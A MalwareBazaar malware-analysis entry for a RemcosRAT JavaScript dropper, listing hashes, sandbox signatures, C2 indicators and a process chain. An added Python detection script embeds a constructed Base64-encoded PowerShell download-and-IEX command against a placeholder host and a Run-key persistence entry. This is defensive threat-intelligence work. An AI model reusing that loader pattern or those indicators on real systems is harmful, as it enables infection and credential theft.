MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RemcosRAT


Vendor detections: 13



SHA256 hash: f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e
SHA3-384 hash: ace1722007eb1cf50cab0f74eafc74bb511d4a58e41dbb18af5869ec472a9eaa7ee8114f2935359194efdb530dd7890b
SHA1 hash: 0745a3f0f529206ae528db040c4f04fb7cb6ec39
MD5 hash: 2623c39f0d8e49d66632c2157372ba48
humanhash: whiskey-purple-spaghetti-foxtrot
File name: co.js
Signature: RemcosRAT
File size: 65'955 bytes
First seen: 2026-05-08 09:48:28 UTC
Last seen: Never
File type: JavaScript (JS) js
MIME type: text/plain
ssdeep: 384:we6jeCijxXyWHBCH1y3SDhJc0zHKHx+lj4:F6CljxXyWHBCVy3SDX9zHuws
Threatray: 181 similar samples on MalwareBazaar
TLSH: T1DC53353501F3A9DA0D67461D877E467E427B3AD6CCB70834E7C539CA8B24E6E980B1D8
Magika: javascript
Reporter: abuse_ch
Tags: js RemcosRAT

Intelligence


File Origin
# of uploads: 1
# of downloads: 115
Origin country: SE
Vendor Threat Intelligence
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-vm evasive fingerprint formbook repaired

Verdict: Malicious
File Type: js
First seen: 2026-05-07T04:52:00Z UTC
Last seen: 2026-05-08T12:03:00Z UTC
Hits: ~10
Detections: Trojan.JS.SAgent.sb HEUR:Trojan.Script.Generic
Result
Threat name: Remcos, PhantomGate
Detection: malicious
Classification: phis.troj.spyw.expl.evad
Score: 100 / 100
Signature
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to bypass UAC (CMSTPLUA)
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates multiple autostart registry keys
Creates processes via WMI
Detected Remcos RAT
Excessive usage of taskkill to terminate processes
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found stalling execution ending in API Sleep call
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Decrypt And Execute Base64 Data
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Register Wscript In Run Key
Sigma detected: Remcos
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Unusual module load detection (module proxying)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected PhantomGate
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph ID: 1910581
Sample: co.js
Start date: 08/05/2026
Architecture: WINDOWS
Score: 100
Root-node signatures: Sigma detected: Register Wscript In Run Key; Suricata IDS alerts for network traffic; Found malware configuration; 22 other signatures

Network contacts (by process, as drawn in the graph):
powershell.exe -> raw.githubusercontent.com 185.199.109.133:443 (FASTLYUS, Netherlands)
powershell.exe -> bitbucket.org 104.192.142.25:443 (AMAZON-AESUS, United States)
powershell.exe -> yaso.su 172.67.213.5:443 (CLOUDFLARENETUS, United States)
powershell.exe -> 104.192.142.24:443 (AMAZON-AESUS, United States)
RegAsm.exe -> cestfininewdns.vip 83.142.209.242:2404 (PL-METROINTERNETPL, Ukraine)
9 other IPs or domains not shown in the graph

Dropped files:
C:\ProgramData\ribnmSp.js (ASCII), written by powershell.exe
C:\Users\user\AppData\Local\Temp\TH41FD.tmp (MS-DOS), written by RegAsm.exe
C:\Users\user\AppData\Local\Temp\TH4122.tmp (MS-DOS), written by RegAsm.exe
C:\Users\user\AppData\Local\Temp\TH40B3.tmp (MS-DOS), written by RegAsm.exe

Process chain (summarised from the graph):
Root -> powershell.exe (three instances shown) plus 13 other processes [Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found; Creates processes via WMI]
powershell.exe (first instance) [Suspicious powershell command line found; Creates multiple autostart registry keys; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading] -> RegAsm.exe, powershell.exe, conhost.exe
powershell.exe (second instance) [Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes] -> powershell.exe and 2 other processes
RegAsm.exe [Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Found stalling execution ending in API Sleep call; 7 other signatures] -> userinit.exe (two instances) and 4 other processes
userinit.exe [Tries to steal Mail credentials (via file registry); Tries to harvest and steal browser information (history, passwords, etc); Unusual module load detection (module proxying); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)]
powershell.exe (child of the first instance) [Suspicious powershell command line found; Creates multiple autostart registry keys; Writes to foreign memory regions; 2 other signatures] -> powershell.exe, RegAsm.exe [Detected Remcos RAT], conhost.exe
powershell.exe -> cmd.exe -> conhost.exe and taskkill.exe (three instances each) [Excessive usage of taskkill to terminate processes]
Threat name: Script-JS.Trojan.Kepavll
Status: Malicious
First seen: 2026-05-07 16:42:44 UTC
File Type: Text (JavaScript)
AV detection: 12 of 24 (50.00%)
Threat level: 5/5
Result
Malware family:
Score: 10/10
Tags: family:remcos botnet:remotehost collection defense_evasion discovery execution persistence rat
Behaviour
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: JavaScript
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Accesses Microsoft Outlook accounts
Adds Run key to start application
Contacts third-party web service commonly abused for C2
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detected Nirsoft tools
Family: Remcos
Process spawned unexpected child process
Malware Config
C2 Extraction: cestfininewdns.vip:2404
Please note that we are no longer able to provide a coverage score for Virus Total.
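The Sigma titles in the Joe Sandbox signature list above (WScript or CScript Dropper, Wscript starts Powershell, Base64 Encoded PowerShell Command Detected, PowerShell Base64 Encoded FromBase64String Cmdlet, Suspicious PowerShell IEX Execution Patterns, Net WebClient Casing Anomalies, Register Wscript In Run Key) and the "Adds Run key to start application" / "Command and Scripting Interpreter: PowerShell" behaviours in the second vendor block describe one chain: a .js file run by wscript.exe launches an encoded PowerShell stage that unwraps further Base64 before the RegAsm.exe injection. The script below is an added example, not part of the MalwareBazaar entry and not any vendor's rule set: it applies simplified reimplementations of those checks to a few constructed Sysmon-style events (field names follow Sysmon; the events, the encoded command line and the URL stage.example.invalid are invented, not telemetry from this sample) and statically peels the FromBase64String layers so the embedded download URL can be read without executing the payload. The only string reused from the page is the dropped-file path C:\ProgramData\ribnmSp.js.

```python
"""Added example: simplified Sigma-style triage of the WScript -> encoded PowerShell chain.

Not part of the MalwareBazaar entry or any vendor's rules. Events below are constructed
Sysmon-style records (Event ID 1 process create, Event ID 13 registry set), not telemetry
from the real sample; the URL stage.example.invalid is invented.
"""
import base64
import re

# --- constructed telemetry (assumption, not from the sample) -----------------
# Inner stage: odd-cased Net.WebClient downloader piped to IEX.
INNER = "(New-Object nEt.WeBcLiEnT).DownloadString('https://stage.example.invalid/p.ps1') | IEX"
# Middle layer: the inner stage wrapped in FromBase64String(...) and IEX.
WRAPPED = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('%s')))"
           % base64.b64encode(INNER.encode()).decode())
# Outer layer: what appears on the command line after -enc (Base64 of UTF-16LE).
ENCODED = base64.b64encode(WRAPPED.encode("utf-16le")).decode()

EVENTS = [
    {"id": 1, "type": "ProcessCreate", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\Users\user\Downloads\co.js'},
    {"id": 2, "type": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    # Persistence: Run key pointing wscript at the dropped path named on the page.
    {"id": 3, "type": "RegistrySet",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\upd",
     "Details": r"wscript.exe //B C:\ProgramData\ribnmSp.js"},
    {"id": 4, "type": "ProcessCreate", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
B64_ARG = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL = re.compile(r"https?://[^\s'\"()]+")
WEBCLIENT = re.compile(r"(?i)net\.webclient")
SCRIPT_EXT = re.compile(r"(?i)\.(js|jse|vbs|vbe|wsf)\b")
IEX = re.compile(r"(?i)\b(iex|invoke-expression)\b")


def decode_encoded_command(cmdline):
    """Return the script carried by -e/-enc/-EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def unwrap_layers(script, max_depth=5):
    """Statically peel nested FromBase64String('...') layers; nothing is executed.
    Returns the layers outermost first. A layer is decoded as UTF-16LE when its odd
    bytes are mostly NUL (the [Text.Encoding]::Unicode case), otherwise as UTF-8."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_ARG.search(layers[-1])
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            break
        odd = raw[1::2]
        enc = "utf-16le" if odd and odd.count(0) > len(odd) // 2 else "utf-8"
        layers.append(raw.decode(enc, errors="replace"))
    return layers


def _basename_is(image, *names):
    return image.lower().rsplit("\\", 1)[-1] in names


def triage(events):
    """Apply simplified versions of the Sigma checks named on the page.
    Returns ({rule title: [event ids]}, [URLs recovered from the decoded layers])."""
    hits, urls = {}, []

    def hit(rule, ev):
        hits.setdefault(rule, []).append(ev["id"])

    for ev in events:
        if ev["type"] == "RegistrySet":
            if ("\\currentversion\\run\\" in ev["TargetObject"].lower()
                    and "wscript" in ev["Details"].lower()):
                hit("Register Wscript In Run Key", ev)
            continue
        img, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
        if _basename_is(img, "wscript.exe", "cscript.exe") and SCRIPT_EXT.search(cmd):
            hit("WScript or CScript Dropper", ev)
        if not _basename_is(img, "powershell.exe", "pwsh.exe"):
            continue
        if _basename_is(parent, "wscript.exe", "cscript.exe"):
            hit("Wscript starts Powershell", ev)
        script = decode_encoded_command(cmd)
        if script is None:
            continue
        hit("Base64 Encoded PowerShell Command Detected", ev)
        blob = "\n".join(unwrap_layers(script))
        if B64_ARG.search(blob):
            hit("PowerShell Base64 Encoded FromBase64String Cmdlet", ev)
        if IEX.search(blob):
            hit("Suspicious PowerShell IEX Execution Patterns", ev)
        if any(m.group(0) != "Net.WebClient" for m in WEBCLIENT.finditer(blob)):
            hit("Net WebClient Casing Anomalies", ev)
        urls.extend(URL.findall(blob))
    return hits, urls


if __name__ == "__main__":
    rules, found = triage(EVENTS)
    for title, ids in sorted(rules.items()):
        print(f"{title}: events {ids}")
    print("URLs recovered without executing the payload:", found)
```

The decoder deliberately stops at string extraction: it never evaluates the peeled script, so string-building tricks (concatenation, -replace, char arrays) that hide the Base64 argument will defeat it and should be treated as a reason to detonate in a sandbox rather than as a clean result. Run against real Sysmon exports, the four constructed records would be replaced by the parsed EventData fields of Event IDs 1 and 13.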

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Malware family: RemcosRAT
File type: JavaScript (JS) js
SHA256: f9f2a7fe68739a20d05d05581b08aed976acfb72bf7398d78f57eb70f8fb101e (this sample)

Delivery method
Distributed via web download
